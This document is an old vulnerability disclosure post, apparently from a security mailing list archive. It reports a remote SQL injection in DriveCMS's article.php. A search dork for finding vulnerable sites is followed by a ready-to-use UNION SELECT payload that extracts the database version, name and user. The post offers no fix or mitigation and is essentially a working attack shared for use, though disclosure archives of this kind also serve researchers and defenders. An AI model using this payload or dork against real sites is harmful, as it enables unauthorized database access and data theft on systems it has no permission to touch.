Related information

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

Remote access vulnerability using BigDump ver. 0.29b

Arab Portal v2.1 Remote File Disclosure (Win32)

hMAilServer 4.4.2 (PHPWebAdmin) local & remote file inclusion

FirmChannel Digital Signage 3.24 Cross-site scripting

From:	beenudel1986_(at)_gmail.com <beenudel1986_(at)_gmail.com>
Date:	10.11.2008
Subject:	DriveCMS article.php remote sql injection

################################################################
#
# Author: Beenu Arora
#
# Home  : www.BeenuArora.com
#
# Email : beenudel1986@gmail.com
#
# Share the c0de!
#
################################################################
#
# Title: DriveCMS Article.php Sql Injection

#
# Vendor: http://drivecms.com

#
#
###########################################################
#
# d0rk:Powered by DriveCMS
#
###########################################################

       
    
    Live Demo:
       payload:
/article.php?id=-1+union+select+1,concat(version(),0x3a,
database(),0x3a,user()),3,4,5,6,7,8,9.10,11,12,13,14,15,16,
17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33--
       Column number can be diffrent too

    

###########################################################
#
#  Bug discovered : 02 Nov.2008
###########################################################